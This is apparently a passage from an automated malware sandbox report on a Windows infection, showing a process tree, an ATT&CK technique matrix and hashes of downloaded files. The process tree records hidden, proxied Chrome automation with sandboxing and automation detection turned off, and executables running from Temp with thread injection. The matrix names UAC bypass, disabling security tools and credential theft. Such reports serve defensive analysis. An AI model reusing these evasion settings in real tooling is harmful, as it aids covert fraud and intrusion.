                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1516,14909980359408777959,16036548628718534080,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-logging --log-level=0 --proxy-server=socks4://192.162.246.222:51496 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" --user-data-dir="C:/ProgramData/User Data81" --enable-logging --log-level=0 --mojo-platform-channel-handle=3704 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:5492
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --field-trial-handle=1516,14909980359408777959,16036548628718534080,131072 --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --disable-blink-features=AutomationControlled --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" --user-data-dir="C:/ProgramData/User Data81" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:1384
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --field-trial-handle=1516,14909980359408777959,16036548628718534080,131072 --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --disable-blink-features=AutomationControlled --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" --user-data-dir="C:/ProgramData/User Data81" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:5368
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1516,14909980359408777959,16036548628718534080,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-logging --log-level=0 --proxy-server=socks4://192.162.246.222:51496 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" --user-data-dir="C:/ProgramData/User Data81" --enable-logging --log-level=0 --mojo-platform-channel-handle=2252 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:3240
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --field-trial-handle=1516,14909980359408777959,16036548628718534080,131072 --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --disable-blink-features=AutomationControlled --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" --user-data-dir="C:/ProgramData/User Data81" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4396
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1516,14909980359408777959,16036548628718534080,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-logging --log-level=0 --proxy-server=socks4://192.162.246.222:51496 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" --user-data-dir="C:/ProgramData/User Data81" --enable-logging --log-level=0 --mojo-platform-channel-handle=4664 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:1996
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1516,14909980359408777959,16036548628718534080,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-logging --log-level=0 --proxy-server=socks4://192.162.246.222:51496 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" --user-data-dir="C:/ProgramData/User Data81" --enable-logging --log-level=0 --mojo-platform-channel-handle=3732 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:1804
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1516,14909980359408777959,16036548628718534080,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-logging --log-level=0 --proxy-server=socks4://192.162.246.222:51496 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36" --user-data-dir="C:/ProgramData/User Data81" --enable-logging --log-level=0 --mojo-platform-channel-handle=3960 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:3240
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\ProgramData\chromedriver.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\ProgramData\chromedriver.exe" --port=62035
                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:6064
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\ProgramData\chromedriver.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\ProgramData\chromedriver.exe" --port=51891
                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:5604
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-backgrounding-occluded-windows --disable-blink-features=AutomationControlled --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-gpu --disable-hang-monitor --disable-infobars --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-blink-features=ShadowDOMV0 --enable-logging --log-level=0 --mute-audio --no-first-run --no-sandbox --no-service-autorun --password-store=basic --proxy-server=socks4://192.162.246.222:51497 --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36" --user-data-dir="C:/ProgramData/User Data19" --window-position=2000,2000
                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6084
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\ProgramData\User Data19" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\ProgramData\User Data19\Crashpad" "--metrics-dir=C:\ProgramData\User Data19" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff9fac84f50,0x7ff9fac84f60,0x7ff9fac84f70
                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5096
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,7438562609079091298,16617897108340226179,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-logging --log-level=0 --proxy-server=socks4://192.162.246.222:51497 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36" --user-data-dir="C:/ProgramData/User Data19" --enable-logging --log-level=0 --mojo-platform-channel-handle=1660 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6152
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1620,7438562609079091298,16617897108340226179,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-logging --log-level=0 --proxy-server=socks4://192.162.246.222:51497 --mute-audio --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36" --user-data-dir="C:/ProgramData/User Data19" --enable-logging --log-level=0 --mojo-platform-channel-handle=2032 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6180
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --field-trial-handle=1620,7438562609079091298,16617897108340226179,131072 --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --disable-blink-features=AutomationControlled --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36" --user-data-dir="C:/ProgramData/User Data19" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2208 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6228
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --field-trial-handle=1620,7438562609079091298,16617897108340226179,131072 --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --disable-blink-features=AutomationControlled --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36" --user-data-dir="C:/ProgramData/User Data19" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2200 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6220
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1620,7438562609079091298,16617897108340226179,131072 --no-sandbox --enable-logging --log-level=0 --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36" --user-data-dir="C:/ProgramData/User Data19" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --enable-logging --log-level=0 --mojo-platform-channel-handle=1632 /prefetch:2
                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5656
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-sandbox --enable-logging --log-level=0 --remote-debugging-port=0 --test-type=webdriver --field-trial-handle=1620,7438562609079091298,16617897108340226179,131072 --disable-gpu-compositing --enable-blink-features=ShadowDOMV0 --disable-blink-features=AutomationControlled --lang=en-US --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36" --user-data-dir="C:/ProgramData/User Data19" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3036 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:6572
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\ProgramData\chromedriver.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\ProgramData\chromedriver.exe" --port=51891
                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5280
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\A9B4.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\A9B4.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3492
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1337.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1337.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4600
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Private.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Private.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2484
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Private.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Private.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1624
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Private.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Private.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4552
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6112
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1560
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4124
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2036
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5548
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5980
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4532
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4588
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5600
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3492
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:648
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20210805-1938.dm
                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2440
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5188
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\AUDIODG.EXE 0x3d0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4596

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1031

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1060

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1197

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1088

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Disabling Security Tools

                                                                                                                                                                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1089

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Bypass User Account Control

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1088

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                                                BITS Jobs

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1197

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1130

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Credential Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                                                                                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1081

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Security Software Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1063

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1120

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Collection

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Data from Local System

                                                                                                                                                                                                                                                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a5f4ae283ff270eb3887600fb10c1773

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a68ee513b3f62259b88793e0f3e7dbd864979331

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  98e0a037573aa2edc81dd714fe366632f318d9e7da87b5725d3d44b4bebad9e3

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  13dc05ec5dd2878efbd9063ef983211b57e5b533d3358bea055f34ea870883b0cf559d961f5f53d7b6d4ce1d3422a50776925a9fcccaf9558916f92b66e45d35

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  13ea31ffc7c2daec89a696b2ea77e5b1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  61ea8f2c663fca319a8bcee8234082e145e27cd9

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f9711c5eb382942a84e44c29691f9afec882faa0192e4149eb2b8660e0c29c3a

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  14504a15c16af0f094fd27bfa6211d10cc50da472baf17b5a25fa1e680f0f9ff794b9fa6c5c98938300026cf3f1fd18f5a122523f1fa6c86da36205683429ad2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
